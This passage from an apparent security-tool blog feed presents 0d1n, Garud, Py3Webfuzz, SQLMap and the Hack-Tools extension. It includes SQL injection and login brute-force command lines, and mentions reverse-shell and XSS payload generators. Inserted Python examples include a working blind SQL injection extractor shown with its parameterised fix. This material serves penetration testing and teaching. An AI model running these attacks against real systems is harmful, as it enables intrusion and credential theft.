each machine has a different context.</p> <p>For a SQL injection attack:</p> <pre><code>$ 0d1n --host 'http://site.com/view/1^/product/^/' --payloads /opt/0d1n/payloads/sqli_list.txt --find_string_list /opt/0d1n/payloads/sqli_str2find_list.txt --log log1337 --tamper randcase --threads 800 --timeout 3 --save_response<br /></code></pre> <p>Note: tamper is a resource for trying to bypass the web application firewall.</p> <p>To <a href="https://www.kitploit.com/search/label/Brute%20Force" target="_blank" title="brute force">brute force</a> an auth system:</p> <pre><code>0d1n --host 'http://site.com/auth.py' --post 'user=admin&password=^' --payloads /opt/0d1n/payloads/wordlist.txt --log log007 --threads 500 --timeout 3<br /></code></pre> <p>Note: if there is a CSRF token, you can use an argument to fetch this token on each request and brute force...</p> <p>Search for SQLi in hard mode in a login system with a CSRF token:</p> <pre><code>0d1n --host "http://127.0.0.1/vulnerabilities/sqli/index.php?id=^" --payloads /opt/0d1n/payloads/sqli.txt --find_string_list /opt/0d1n/payloads/find_responses.txt --token_name user_token --log logtest_fibonaci49 --cookie_jar /home/user_name/cookies.txt --save_response --tamper randcase --threads 100<br /></code></pre> <p>Note: export the cookie jar from your browser and save it as cookies.txt so it can be loaded.</p> <br /><span style="font-size: large;"><b>Notes on external libs</b></span><br /> <ul> <li> <p>To gain extreme <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a>, 0d1n uses a thread pool of POSIX threads; you can study this small library: <a href="https://github.com/Pithikos/C-Thread-Pool" rel="nofollow" target="_blank" title="https://github.com/Pithikos/C-Thread-Pool">https://github.com/Pithikos/C-Thread-Pool</a></p> </li> <li> <p>0d1n uses OpenBSD/NetBSD string functions such as strlcat() and strlcpy() to prevent buffer overflows.</p> </li> </ul> <br /><span style="font-size: large;"><b>Project Overview on 
cloc</b></span><br /> <pre><code>cooler@gentoo:~/codes$ cloc 0d1n/<br />     937 text files.<br />     532 unique files.<br />     451 files ignored.<br /><br />-------------------------------------------------------------------------------<br />Language                     files          blank        comment           code<br />-------------------------------------------------------------------------------<br />JavaScript                     361           9951          15621          52178<br />C                               51           4986           4967          26642<br />C/C++ Header                    30           1184           2858           4295<br />CSS                             10            434            369           2142<br />HTML                             7             59              0           1616<br />TeX                              2             52              4            206<br />Markdown                         3             81              0            137<br />make                             4             36              9            130<br />Bourne Shell                     2              0              0              4<br />-------------------------------------------------------------------------------<br />SUM:                           487          16835          23846          91213<br />-------------------------------------------------------------------------------<br /><br /></code></pre> <p>Read the docs and the help menu shown when you execute the "0d1n" binary...</p> <p>Do you have any questions about 0d1n? Please create an issue in this repository; I can help you...</p> <br /><span style="font-size: large;"><b>To study old versions, look at the following:</b></span><br /> <p><a href="http://sourceforge.net/projects/odin-security-tool/files/?source=navbar" rel="nofollow" target="_blank" title="http://sourceforge.net/projects/odin-security-tool/files/?source=navbar">http://sourceforge.net/projects/odin-security-tool/files/?source=navbar</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CoolerVoid/0d1n" rel="nofollow" target="_blank" title="Download 0D1N">Download 0D1N</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-15369254715458756262020-11-16T08:30:00.017-03:002020-11-16T08:30:01.733-03:00Garud - An Automation Tool That Scans Sub-Domains, Sub-Domain Takeover And Then Filters Out XSS, SSTI, SSRF And More Injection Point Parameters<div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-wKBpPH8MsMg/X7H1dmkHByI/AAAAAAAAUXI/KqSdwXPydfciODlnHodwI79xtKjvDAJ-QCNcBGAsYHQ/s1640/Garud_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1640" height="260" src="https://1.bp.blogspot.com/-wKBpPH8MsMg/X7H1dmkHByI/AAAAAAAAUXI/KqSdwXPydfciODlnHodwI79xtKjvDAJ-QCNcBGAsYHQ/w640-h260/Garud_1.png" width="640" /></a></div><p><br /></p> <p>An <a href="https://www.kitploit.com/search/label/Automation" target="_blank" title="automation">automation</a> tool that enumerates sub-domains, checks for sub-domain takeover and then filters out xss, ssti, ssrf and other <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> point parameters.<br /></p> <span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fVMr1Ku8MW8/X7H1lqSCffI/AAAAAAAAUXM/2V67cq8GELovkQuBQuMNizD5F24BqyKzACNcBGAsYHQ/s800/Garud_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="800" height="456" src="https://1.bp.blogspot.com/-fVMr1Ku8MW8/X7H1lqSCffI/AAAAAAAAUXM/2V67cq8GELovkQuBQuMNizD5F24BqyKzACNcBGAsYHQ/w640-h456/Garud_2.gif" width="640" /></a></div><p><br /></p> <ul> <li> <strong>Requirements:</strong> Go, Python 2.7 or Python 3. </li> <li> <strong>System requirements:</strong> Recommended to run on a VPS with 1 vCPU and 2 GB RAM. 
</li> <li> <strong>Tools used (you must install these before running the script)</strong><br /> <ul> <li><a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="SubFinder">SubFinder</a></li> <li><a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="Sublist3r">Sublist3r</a></li> <li><a href="https://github.com/1ndianl33t/Gf-Patterns" rel="nofollow" target="_blank" title="GF Patterns">GF Patterns</a></li> <li><a href="https://github.com/lc/gau" rel="nofollow" target="_blank" title="Gau">Gau</a></li> <li><a href="https://github.com/LukaSikic/subzy" rel="nofollow" target="_blank" title="Subzy">Subzy</a></li> <li><a href="https://github.com/haccer/subjack" rel="nofollow" target="_blank" title="Subjack">Subjack</a>: save the <a href="https://github.com/haccer/subjack/blob/master/fingerprints.json" rel="nofollow" target="_blank" title="fingerprints.json">fingerprints.json</a> file into the ~/tools/ directory.</li> <li><a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="Assetfinder">Assetfinder</a></li> <li><a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="HTTPX">HTTPX</a></li> <li><a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" title="Waybackurls">Waybackurls</a></li> </ul> </li> <li> <strong>Installation</strong> </li> </ul> <div><pre><code>git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud && mv garud /usr/local/bin/</code></pre></div> <ul> <li><strong>Usage</strong></li> </ul> <div><pre><code>garud -d target.com -f filename</code></pre></div> <br /><span style="font-size: large;"><b>About Garud</b></span><br /> <p>I made this tool to automate my recon and save time. It always gave me a headache to type one command, wait for it to complete, and then type the next one. 
So I collected some of the tools that are widely used in the <a href="https://www.kitploit.com/search/label/Bugbounty" target="_blank" title="bugbounty">bugbounty</a> field. In this script I used Assetfinder, get-titles, httprobe, subjack, subzy, sublister, gau and gf patterns.<br /> The script first enumerates all the <a href="https://www.kitploit.com/search/label/Subdomains" target="_blank" title="subdomains">subdomains</a> of the given target domain using assetfinder and sublister, then filters the live hosts out of the full subdomain list, then extracts the page titles of those subdomains using get-title, then scans them for <a href="https://www.kitploit.com/search/label/Subdomain%20Takeover" target="_blank" title="subdomain takeover">subdomain takeover</a> using subjack and subzy. Next it uses gau to collect parameterised URLs for those subdomains and applies gf patterns to filter out the xss, ssti, ssrf and sqli candidate parameters. The output for each class is saved to a text file such as target-xss.txt. 
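The parameter-filtering step described above, as an added example that is not Garud's own code and not the pattern files shipped by GF-Patterns: the parameter-name lists, the sample URLs and every helper name below are constructed for illustration. It goes one step beyond the script by first stripping parameter values, so thousands of gau results that differ only in values collapse to one injection point per class.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed parameter-name patterns in the spirit of gf patterns. Assumption:
# these lists were written for this example and are not the ones GF-Patterns ships.
# A name can legitimately appear under more than one class.
PATTERNS = {
    "xss":  r"^(q|s|search|query|keyword|lang|name|msg|message|comment|title|text)$",
    "ssti": r"^(name|template|tpl|view|preview|theme|layout|content)$",
    "ssrf": r"^(url|uri|dest|redirect|next|return|src|href|feed|host|domain|path|file|image|proxy|callback)$",
    "sqli": r"^(id|uid|pid|cat|category|item|page|order|sort|column|table|user|username|ref|report)$",
}
COMPILED = {cls: re.compile(rx, re.IGNORECASE) for cls, rx in PATTERNS.items()}


def param_names(url: str) -> list[str]:
    """Query-string keys in order; blank values are kept so '?q=' still counts."""
    return [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]


def canonical(url: str) -> str:
    """Drop parameter values so URLs that differ only in values collapse to one
    injection point (the same idea as piping gau output through a value stripper)."""
    parts = urlsplit(url)
    keys = param_names(url)
    base = f"{parts.scheme}://{parts.netloc}{parts.path}"
    return base + ("?" + "&".join(f"{k}=" for k in keys) if keys else "")


def classify(url: str) -> dict[str, list[str]]:
    """{class: [matching parameter names]} for one URL; empty dict when nothing matches."""
    names = param_names(url)
    return {cls: [n for n in names if rx.match(n)]
            for cls, rx in COMPILED.items()
            if any(rx.match(n) for n in names)}


def bucket(urls) -> dict[str, list[str]]:
    """Group canonical URLs per class, deduplicated and in first-seen order:
    the content that would end up in target-xss.txt, target-sqli.txt and so on."""
    out: dict[str, list[str]] = defaultdict(list)
    for url in urls:
        canon = canonical(url)
        for cls in classify(url):
            if canon not in out[cls]:
                out[cls].append(canon)
    return dict(out)


# Constructed sample of what gau/waybackurls might return for a target.
SAMPLE_URLS = [
    "https://app.example.com/search?q=shoes&page=2",
    "https://app.example.com/search?q=hats&page=3",       # same injection points as above
    "https://app.example.com/fetch?url=http://127.0.0.1:8080/",
    "https://app.example.com/render?template=home",
    "https://app.example.com/static/logo.png",            # no parameters: ignored
]

if __name__ == "__main__":
    for cls, hits in bucket(SAMPLE_URLS).items():
        print(f"target-{cls}.txt:")
        for hit in hits:
            print("   ", hit)
```

Matching on parameter names alone is deliberately noisy: it is a triage filter that decides which URLs are worth a scanner's time, not evidence of a vulnerability, which is why the same URL can land in several output files.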
</p> <br /><b>Thanks to the authors of the tools used in this script.</b><br /> <p><a href="https://github.com/aboul3la" rel="nofollow" target="_blank" title="@aboul3la">@aboul3la</a> <a href="https://github.com/tomnomnom" rel="nofollow" target="_blank" title="@tomnomnom">@tomnomnom</a> <a href="https://github.com/lc" rel="nofollow" target="_blank" title="@lc">@lc</a> <a href="https://github.com/LukaSikic" rel="nofollow" target="_blank" title="@LukaSikic">@LukaSikic</a> <a href="https://github.com/haccer" rel="nofollow" target="_blank" title="@haccer">@haccer</a></p> <p><strong>Warning:</strong> This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/R0X4R/Garud" rel="nofollow" target="_blank" title="Download Garud">Download Garud</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9208949521052695092020-11-10T17:30:00.014-03:002020-11-10T17:30:01.298-03:00Py3Webfuzz - A Python3 Module To Assist In Fuzzing Web Applications<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-orO-gUro2bw/X6iHNMtmu4I/AAAAAAAAUTs/SH8JlI7Z304rGtF9L2QJ0Jqu5mfyGH4DACNcBGAsYHQ/s1874/py3webfuzz_3_sqli-code-test.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="873" data-original-width="1874" height="298" src="https://1.bp.blogspot.com/-orO-gUro2bw/X6iHNMtmu4I/AAAAAAAAUTs/SH8JlI7Z304rGtF9L2QJ0Jqu5mfyGH4DACNcBGAsYHQ/w640-h298/py3webfuzz_3_sqli-code-test.gif" width="640" /></a></div><p><br /></p><div> <p>Based on pywebfuzz, Py3webfuzz is a Python3 module to assist in the identification of <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in web applications, Web Services 
through brute force, fuzzing and analysis. The module does this by providing common testing values, generators and other utilities that are helpful when fuzzing web applications and API <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> and when developing web exploits.</p> <p>py3webfuzz has fuzzdb and some other miscellaneous sources implemented as Python classes, methods and functions for ease of use. The fuzzdb project is just a collection of values for testing; the point here is to provide a good selection of values from fuzzdb and some other sources, cleaned up and available through Python3 classes, methods and namespaces. This makes it easier to use these values in your own <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploits</a> and PoCs.</p> <p>Effort was made to match the names to the folders and values of the latest fuzzdb project. This sometimes makes for ugly-looking namespaces, but the trade-off was made so that familiarity with the fuzzdb project carries over into the Python code. The main exception is that hyphens are replaced with underscores.</p> <span><a name='more'></a></span><div><br /></div><b>INSTALLATION</b><br /> <p>Installation can be done in a couple of ways. 
If you want, use a virtual environment.</p> <br /><span style="font-size: large;"><b>Using Python setuptools</b></span><br /> <p><a href="http://pypi.python.org/pypi/setuptools" rel="nofollow" target="_blank" title="http://pypi.python.org/pypi/setuptools">http://pypi.python.org/pypi/setuptools</a></p> <div><pre><code>$ git clone https://github.com/jangelesg/py3webfuzz.git<br />$ cd py3webfuzz/</code></pre></div> <p>You can run the supplied setup.py with the install command</p> <div><pre><code> $ python setup.py install</code></pre></div> <p>You can also use easy_install if that's what you use to manage your installed packages (easy_install is deprecated in current setuptools; <code>pip install</code> accepts the same tarball)</p> <div><pre><code> $ easy_install py3webfuzz_VERSION.tar.gz</code></pre></div> <p>You can also point to the location where the tar.gz lives on the web</p> <div><pre><code> $ easy_install URL_package</code></pre></div> <p>You should be good to go.</p> <br /><span style="font-size: large;"><b>Use in your Code</b></span><br /> <ul> <li>Some test cases can be found within the info sub folder</li> </ul> <div><pre><code># Access SQLi values and encode them for further use<br /># Import Library<br />from py3webfuzz import fuzzdb<br />from py3webfuzz import utils, encoderFuncs<br /># Instantiate a Class Object that gives you access to a set of SQLi values<br />sqli_detect_payload = fuzzdb.Attack.AttackPayloads.SQLi.Detect()<br /># Get access to those values through a list<br />for index, payload in enumerate(sqli_detect_payload.Generic_SQLI):<br />    print(f"Payload: {index} Value: {payload}")<br />    # Using encoderFuncs you can get different handy encodings to develop exploits<br />    print(f"SQLi Char Encode: {encoderFuncs.sqlchar_encode(payload)}")</code></pre></div> <div><pre><code># Send an HTTP request to your target<br /># Import Library<br />from py3webfuzz import utils<br /># Customise your target and headers<br />location = "http://127.0.0.1:8080/WebGoat/start.mvc#lesson/WebGoatIntroduction.lesson"<br />headers = {"Host": "ssl.scroogle.org",<br />           "User-Agent": "Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Mac_68K)",<br />           "Content-Type": "application/x-www-form-urlencoded"}<br /># make_request returns a dict object with all the elements for your pentest:<br /># "headers": response.headers, "content": response.content, "status_code": response.status_code,<br /># 'json': response.json, "text": response.text, "time": f"Total in seconds: {time}"<br />res = utils.make_request(location, headers=headers, method="get")<br /># print the response<br />print(res)</code></pre></div> <br /><span style="font-size: large;"><b>Demo</b></span><br /> <p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-az7VYJRZcDY/X6iHXZWqoUI/AAAAAAAAUTw/hdqJPLSXJa8tIddnEeE6STJkHppYih-jwCNcBGAsYHQ/s1874/py3webfuzz_3_sqli-code-test.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="873" data-original-width="1874" height="298" src="https://1.bp.blogspot.com/-az7VYJRZcDY/X6iHXZWqoUI/AAAAAAAAUTw/hdqJPLSXJa8tIddnEeE6STJkHppYih-jwCNcBGAsYHQ/w640-h298/py3webfuzz_3_sqli-code-test.gif" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mUvhAHUfnZ4/X6iHXY-qKVI/AAAAAAAAUT0/VPG1veVDAfM9NscWCJ-hsEk1LurGsjpRQCNcBGAsYHQ/s1730/py3webfuzz_4_encode_functions.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="827" data-original-width="1730" height="306" src="https://1.bp.blogspot.com/-mUvhAHUfnZ4/X6iHXY-qKVI/AAAAAAAAUT0/VPG1veVDAfM9NscWCJ-hsEk1LurGsjpRQCNcBGAsYHQ/w640-h306/py3webfuzz_4_encode_functions.gif" width="640" /></a></div><br /><p></p> <p><b>FUTURE</b></p> <ul> <li>Uploading this module to the <a href="https://www.kitploit.com/search/label/Python%20Package" target="_blank" title="Python Package">Python Package</a> Index.</li> <li>Integrate features, classes, methods and values for Mobile 
Pentest</li> <li>Enhance the XSS and XXE techniques through new features (any ideas are welcome)</li> <li>A feature for Server-Side Template Injection</li> </ul> <div><br /></div><div><span style="font-size: large;"><b>Author</b></span><br /><ul><li>Jonathan Angeles @ex0day</li><li>Github: <a href="https://github.com/jangelesg/py3webfuzz" rel="nofollow" target="_blank" title="https://github.com/jangelesg/py3webfuzz">https://github.com/jangelesg/py3webfuzz</a></li></ul><br /><span style="font-size: large;"><b>Contributors</b></span><br /><ul><li>Nathan Hamiel @nathanhamiel</li></ul></div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/jangelesg/py3webfuzz" rel="nofollow" target="_blank" title="Download Py3Webfuzz">Download Py3Webfuzz</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-82547047773801795722020-09-06T23:38:00.005-03:002020-09-06T23:38:58.876-03:00SQLMap v1.4.9 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xgoFQ6OJ-j8/X1WdGd6e_bI/AAAAAAAATvw/5QJ7fp3Ozmc6bYOUpMQetfsC0rITDMZRQCNcBGAsYHQ/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="603" src="https://1.bp.blogspot.com/-xgoFQ6OJ-j8/X1WdGd6e_bI/AAAAAAAATvw/5QJ7fp3Ozmc6bYOUpMQetfsC0rITDMZRQCNcBGAsYHQ/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, through data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
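What "boolean-based blind" in the list above means in practice, shown as an added example that is not sqlmap's code: a constructed, deliberately injectable lookup backed by an in-memory SQLite database, the bound-parameter version of the same query, and an extractor that recovers a secret using nothing but the page's true/false behaviour. The table, the column values, the helper names and the request counter are all assumptions made for this example; sqlmap automates the same idea (with its own bisection logic and many more tricks) across the listed DBMSes.

```python
import sqlite3

# Constructed demo database (an assumption for this example, not a real target):
# an in-memory SQLite instance with one secret worth stealing.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 's3cret!'), (2, 'bob', 'hunter2');
""")

STATS = {"requests": 0}   # how many "HTTP requests" the attacker had to send


def vulnerable_page(id_param: str) -> bool:
    """Stand-in for an injectable page: the ?id= value is concatenated straight
    into the query. Returns True when the page would render a record and False
    on 'not found' or any DB error. That one bit is the whole side channel."""
    STATS["requests"] += 1
    try:
        row = _conn.execute(f"SELECT name FROM users WHERE id = {id_param}").fetchone()
    except sqlite3.Error:
        return False
    return row is not None


def safe_page(id_param: str) -> bool:
    """The fix: a bound parameter. The payload is compared as data, never parsed
    as SQL, so the oracle below gets no signal out of it."""
    STATS["requests"] += 1
    row = _conn.execute("SELECT name FROM users WHERE id = ?", (id_param,)).fetchone()
    return row is not None


def oracle(condition: str, page=vulnerable_page) -> bool:
    """id=1 is a known-good row; ANDing an attacker-chosen condition onto it makes
    the page's true/false behaviour track that condition."""
    return page(f"1 AND ({condition})")


def bsearch(greater_than, lo: int, hi: int) -> int:
    """Find the hidden integer in [lo, hi] given only answers to 'hidden > mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(expr: str, page=vulnerable_page, max_len: int = 255) -> str:
    """Recover the string value of a scalar SQL expression using boolean answers
    only: first its length, then each character by binary search over the ASCII
    range (7 requests per character instead of up to 128 linear guesses)."""
    length = bsearch(lambda v: oracle(f"length(({expr})) > {v}", page), 0, max_len)
    chars = []
    for pos in range(1, length + 1):                  # SQL substr() is 1-based
        code = bsearch(lambda v: oracle(f"unicode(substr(({expr}), {pos}, 1)) > {v}", page),
                       0, 0x7F)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE name = 'admin'"
    print("vulnerable:", repr(extract(target)), "after", STATS["requests"], "requests")
    STATS["requests"] = 0
    print("parameterised:", repr(extract(target, safe_page)), "after", STATS["requests"], "requests")
```

Against the parameterised page the length search never gets a True answer, so the inferred length is 0 and nothing leaks; against the vulnerable one a 7-character password costs 8 + 7 × 7 = 57 requests. The same loop with a time-based oracle (the Jeeves-style `sleep()` payloads) works identically, only each answer costs a delay instead of a response diff.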
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong>, <strong>2.7.x</strong> and <strong>3.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.4.9</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-13893966694702630772020-08-26T17:30:00.001-04:002020-08-26T17:30:02.462-04:00Hack-Tools - The All-In-One Red Team Extension For Web Pentester<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s1600/Hack-Tools_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s640/Hack-Tools_7.png" width="640" /></a></div>
<br />
<b>The all-in-one <a href="https://www.kitploit.com/search/label/Red%20Team" target="_blank" title="Red Team">Red Team</a> browser extension for <strong>Web Pentesters</strong></b><br />
HackTools is a web extension that facilitates your <strong>web application penetration tests</strong>; it includes <strong>cheat sheets</strong> as well as the <strong>tools</strong> used during a test, such as XSS payloads, reverse shells and much more.<br />
With the extension you <strong>no longer need to search for payloads on different websites</strong> or in your local storage; most of the tools are accessible in one click. HackTools is accessible either in <strong>pop-up mode</strong> or in a whole tab in the browser's <strong>DevTools</strong> panel (F12).<br />
<a name='more'></a><br />
<b>Current functions:</b><br />
<ul>
<li>Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)</li>
<li>Shell Spawning (TTY Shell Spawning)</li>
<li>XSS Payloads</li>
<li>Basic SQLi payloads</li>
<li>Local file inclusion payloads (LFI)</li>
<li>Base64 <a href="https://www.kitploit.com/search/label/Encoder" target="_blank" title="Encoder">Encoder</a> / Decoder</li>
<li>Hash <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="Generator">Generator</a> (MD5, SHA1, SHA256, SHA512)</li>
<li>Useful Linux commands (Port Forwarding, SUID)</li>
</ul>
<br />
<span style="font-size: large;"><b>Preview</b></span><br />
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s1600/Hack-Tools_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s640/Hack-Tools_7.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sJBz-Oqxi_A/XzoTUqkw53I/AAAAAAAATj8/cBNz0HeYppcI2w4iwX5OtB3UJn2f1NZogCNcBGAsYHQ/s1600/Hack-Tools_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-sJBz-Oqxi_A/XzoTUqkw53I/AAAAAAAATj8/cBNz0HeYppcI2w4iwX5OtB3UJn2f1NZogCNcBGAsYHQ/s640/Hack-Tools_8.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
